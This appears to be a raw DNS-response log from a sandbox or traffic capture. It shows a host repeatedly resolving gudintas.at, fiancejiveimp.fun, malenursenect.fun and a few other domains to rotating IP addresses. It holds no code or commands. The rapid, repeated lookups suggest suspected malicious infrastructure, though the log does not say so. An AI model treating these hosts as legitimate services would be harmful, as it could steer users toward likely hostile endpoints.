                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.194246054 CEST8.8.8.8192.168.2.30x1840Server failure (2)fullppc.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.373034954 CEST8.8.8.8192.168.2.30xc66bNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.373034954 CEST8.8.8.8192.168.2.30xc66bNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST8.8.8.8192.168.2.30xb10cNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.966269016 CEST8.8.8.8192.168.2.30xfa9cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.966269016 CEST8.8.8.8192.168.2.30xfa9cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:43.375426054 CEST8.8.8.8192.168.2.30xaf2bNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:43.375426054 CEST8.8.8.8192.168.2.30xaf2bNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:44.661958933 CEST8.8.8.8192.168.2.30x6d69No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:44.661958933 CEST8.8.8.8192.168.2.30x6d69No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.231719017 CEST8.8.8.8192.168.2.30xeb84No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.231719017 CEST8.8.8.8192.168.2.30xeb84No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST8.8.8.8192.168.2.30xe3c3No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.809530973 CEST8.8.8.8192.168.2.30xa393No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.809530973 CEST8.8.8.8192.168.2.30xa393No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.194880962 CEST8.8.8.8192.168.2.30x9019Refused (5)farformafor.funnonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.360810041 CEST8.8.8.8192.168.2.30x59cfNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.360810041 CEST8.8.8.8192.168.2.30x59cfNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.360833883 CEST8.8.8.8192.168.2.30xeb8fNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.360833883 CEST8.8.8.8192.168.2.30xeb8fNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST8.8.8.8192.168.2.30xab5dNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.936570883 CEST8.8.8.8192.168.2.30x14c9No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.936570883 CEST8.8.8.8192.168.2.30x14c9No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.948874950 CEST8.8.8.8192.168.2.30x141cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.948874950 CEST8.8.8.8192.168.2.30x141cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.496278048 CEST8.8.8.8192.168.2.30xdda4No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.496278048 CEST8.8.8.8192.168.2.30xdda4No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.647365093 CEST8.8.8.8192.168.2.30x4953No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.647365093 CEST8.8.8.8192.168.2.30x4953No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.127396107 CEST8.8.8.8192.168.2.30xe059No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.127396107 CEST8.8.8.8192.168.2.30xe059No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.231897116 CEST8.8.8.8192.168.2.30xc722No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.231897116 CEST8.8.8.8192.168.2.30xc722No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST8.8.8.8192.168.2.30xf3deNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.687107086 CEST8.8.8.8192.168.2.30x13e9No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.687107086 CEST8.8.8.8192.168.2.30x13e9No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:49.797671080 CEST8.8.8.8192.168.2.30x6cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:49.797671080 CEST8.8.8.8192.168.2.30x6cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.313868046 CEST8.8.8.8192.168.2.30xe6b3No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.313868046 CEST8.8.8.8192.168.2.30xe6b3No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.538801908 CEST8.8.8.8192.168.2.30x79e4No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.538801908 CEST8.8.8.8192.168.2.30x79e4No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.859267950 CEST8.8.8.8192.168.2.30xabbdNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.859267950 CEST8.8.8.8192.168.2.30xabbdNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.406701088 CEST8.8.8.8192.168.2.30xb534No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.406701088 CEST8.8.8.8192.168.2.30xb534No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.556308985 CEST8.8.8.8192.168.2.30x5032No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.556308985 CEST8.8.8.8192.168.2.30x5032No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.964147091 CEST8.8.8.8192.168.2.30x5144No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.964147091 CEST8.8.8.8192.168.2.30x5144No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.140774965 CEST8.8.8.8192.168.2.30x5e00No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.140774965 CEST8.8.8.8192.168.2.30x5e00No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.495866060 CEST8.8.8.8192.168.2.30x47a7No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.495866060 CEST8.8.8.8192.168.2.30x47a7No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.059636116 CEST8.8.8.8192.168.2.30xe8c3No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.059636116 CEST8.8.8.8192.168.2.30xe8c3No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.841989040 CEST8.8.8.8192.168.2.30x30beNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.841989040 CEST8.8.8.8192.168.2.30x30beNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.911035061 CEST8.8.8.8192.168.2.30x7019No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.911035061 CEST8.8.8.8192.168.2.30x7019No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.385355949 CEST8.8.8.8192.168.2.30xedceNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.385355949 CEST8.8.8.8192.168.2.30xedceNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.936527967 CEST8.8.8.8192.168.2.30xcc91No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.936527967 CEST8.8.8.8192.168.2.30xcc91No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.964479923 CEST8.8.8.8192.168.2.30x51efNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.964479923 CEST8.8.8.8192.168.2.30x51efNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.521279097 CEST8.8.8.8192.168.2.30xb8c5No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.521279097 CEST8.8.8.8192.168.2.30xb8c5No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.531366110 CEST8.8.8.8192.168.2.30x1e1eNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.531366110 CEST8.8.8.8192.168.2.30x1e1eNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.033675909 CEST8.8.8.8192.168.2.30xb58aNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.033675909 CEST8.8.8.8192.168.2.30xb58aNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.224220037 CEST8.8.8.8192.168.2.30x6d9dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.224220037 CEST8.8.8.8192.168.2.30x6d9dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.643771887 CEST8.8.8.8192.168.2.30xa295No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.643771887 CEST8.8.8.8192.168.2.30xa295No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.768393040 CEST8.8.8.8192.168.2.30x310cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.768393040 CEST8.8.8.8192.168.2.30x310cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.258022070 CEST8.8.8.8192.168.2.30x52b6No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.258022070 CEST8.8.8.8192.168.2.30x52b6No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.862906933 CEST8.8.8.8192.168.2.30x6ecaNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.862906933 CEST8.8.8.8192.168.2.30x6ecaNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.308195114 CEST8.8.8.8192.168.2.30xa54dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.308195114 CEST8.8.8.8192.168.2.30xa54dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.455456972 CEST8.8.8.8192.168.2.30x99b9No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.455456972 CEST8.8.8.8192.168.2.30x99b9No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.961735010 CEST8.8.8.8192.168.2.30xe9d0No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.961735010 CEST8.8.8.8192.168.2.30xe9d0No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.074995995 CEST8.8.8.8192.168.2.30xe1ddNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.074995995 CEST8.8.8.8192.168.2.30xe1ddNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.532624006 CEST8.8.8.8192.168.2.30x352bNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.532624006 CEST8.8.8.8192.168.2.30x352bNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.696110964 CEST8.8.8.8192.168.2.30xfbedNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.696110964 CEST8.8.8.8192.168.2.30xfbedNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:00.322927952 CEST8.8.8.8192.168.2.30x9befNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:00.322927952 CEST8.8.8.8192.168.2.30x9befNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:01.517075062 CEST8.8.8.8192.168.2.30x7bd9No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:01.517075062 CEST8.8.8.8192.168.2.30x7bd9No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:02.079523087 CEST8.8.8.8192.168.2.30xa63fNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:02.079523087 CEST8.8.8.8192.168.2.30xa63fNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:04.695039988 CEST8.8.8.8192.168.2.30x9d4dNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:04.695039988 CEST8.8.8.8192.168.2.30x9d4dNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.346637964 CEST8.8.8.8192.168.2.30xa85fNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.346637964 CEST8.8.8.8192.168.2.30xa85fNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.810187101 CEST8.8.8.8192.168.2.30x72f0No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.810187101 CEST8.8.8.8192.168.2.30x72f0No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.906250954 CEST8.8.8.8192.168.2.30x9eebNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.906250954 CEST8.8.8.8192.168.2.30x9eebNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.349039078 CEST8.8.8.8192.168.2.30x71c3No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.349039078 CEST8.8.8.8192.168.2.30x71c3No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.444112062 CEST8.8.8.8192.168.2.30x651dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.444112062 CEST8.8.8.8192.168.2.30x651dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.899698973 CEST8.8.8.8192.168.2.30xb33fNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.899698973 CEST8.8.8.8192.168.2.30xb33fNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.033339977 CEST8.8.8.8192.168.2.30x3a6dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.033339977 CEST8.8.8.8192.168.2.30x3a6dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.572103977 CEST8.8.8.8192.168.2.30xcdf4No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.572103977 CEST8.8.8.8192.168.2.30xcdf4No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.671274900 CEST8.8.8.8192.168.2.30x31a3No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.671274900 CEST8.8.8.8192.168.2.30x31a3No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.122029066 CEST8.8.8.8192.168.2.30x2febNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.122029066 CEST8.8.8.8192.168.2.30x2febNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.283277035 CEST8.8.8.8192.168.2.30xafcbNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.283277035 CEST8.8.8.8192.168.2.30xafcbNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.892225981 CEST8.8.8.8192.168.2.30x3baNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.892225981 CEST8.8.8.8192.168.2.30x3baNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.994808912 CEST8.8.8.8192.168.2.30xe7fNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.994808912 CEST8.8.8.8192.168.2.30xe7fNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:09.494451046 CEST8.8.8.8192.168.2.30xd4bbNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:09.494451046 CEST8.8.8.8192.168.2.30xd4bbNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:10.487987041 CEST8.8.8.8192.168.2.30x9b9fNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:10.487987041 CEST8.8.8.8192.168.2.30x9b9fNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:11.070471048 CEST8.8.8.8192.168.2.30xe659No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:11.070471048 CEST8.8.8.8192.168.2.30xe659No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:14.645804882 CEST8.8.8.8192.168.2.30x2dd0No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
